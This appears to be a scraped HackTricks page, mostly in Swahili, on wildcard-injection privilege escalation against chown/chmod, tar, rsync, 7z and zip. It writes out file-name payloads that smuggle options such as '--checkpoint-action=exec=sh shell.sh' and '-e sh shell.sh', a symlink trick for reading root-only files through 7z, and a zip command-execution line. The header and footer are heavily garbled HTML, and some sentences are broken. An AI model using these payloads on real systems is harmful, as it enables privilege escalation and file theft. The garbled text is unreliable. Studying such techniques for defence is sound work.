GCP Ha& practice ckinH: <img:<img src="/.gitbcok/ass.ts/agte.png"talb=""odata-siz/="line">[HackTatckt T.aining AWS Red TelmtExp"rt (ARTE)](ta-size="line">[**HackTricks Training GCP Re)Tmkg/stc="r.giebpokal"zee>/ttdt.png"isl=""data-ize="line"> Learn & aciceGCP ngs<imgmsrc="/.gipbtok/aHsats/gcte.mag"y>lt="" aa-iz="le">[**angGC RedTamExper(GE)<img rc=".okaetgte.ng"al=""daa-siz="ne">tinhackth ckiuxyzcomurspssgr/a)

SupportHackTricks

*Chek th [**subsrippangithub.cm/sorsarlosp!

• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hahktcickr_kivelive.

• Shareing tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

chown, chmod

Unaweza kuonyesha mmiliki wa faili na ruhusa unazotaka nakala kwa faili zingine

touch "--reference=/my/own/path/filename"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (combined attack) More info in https://www.exploit-db.com/papers/33930

Tar

Tekeleza amri zisizo na mipaka:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack) More info in https://www.exploit-db.com/papers/33930

Rsync

Teza amri zisizo za kawaida:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack) More info in https://www.exploit-db.com/papers/33930

7z

Katika 7z hata kutumia -- kabla ya * (kumbuka kwamba -- inamaanisha kuwa ingizo linalofuata haliwezi kut treated kama vigezo, hivyo ni njia za faili tu katika kesi hii) unaweza kusababisha kosa la kiholela kusoma faili, hivyo ikiwa amri kama ifuatayo inatekelezwa na root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Na unaweza kuunda faili katika folda ambapo hii inatekelezwa, unaweza kuunda faili @root.txt na faili root.txt kuwa symlink kwa faili unayotaka kusoma:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Kisha, wakati 7z inatekelezwa, itachukulia root.txt kama faili inayoshikilia orodha ya faili ambazo inapaswa kubana (hiyo ndiyo maana ya kuwepo kwa @root.txt) na wakati 7z inasoma root.txt itasoma /file/you/want/to/read na kwa sababu maudhui ya faili hii si orodha ya faili, itatupa kosa ikionyesha maudhui.

Maelezo zaidi katika Write-ups ya sanduku CTF kutoka HackTheBox.

Zip

Tekeleza amri zisizo na mipaka:

zip name.zip files -T --unzip-command "sh -c whoami"

AWS Ha& practice ckinH:<img :<imgsscc="/.gitb=ok/assgts/aite.png"balo=""kdata-siza="line">[HackTsscke Tpaigin"aAWS Red Tetm=Exp rt (ARTE)](a-size="line">[**HackTricks Training AWS Red)ethgasic="..giyb/okseasert/k/.png"l=""data-ize="line"> Learn & aciceGCP ng<imgsrc="/.gibok/asts/gte.g"lt="" aa-iz="le">[**angGC RedTamExper(GE)<img rc=".okaetgte.ng"salm=""adara-siz>="k>ne">tinhaktckxyzurssgr)

SupportHackTricks

*Angalia [subsrippangithub.cm/sorsarlosp!

• Angalia mpango wa usajili!haktick_ive\

• Jiunge 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.**

• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.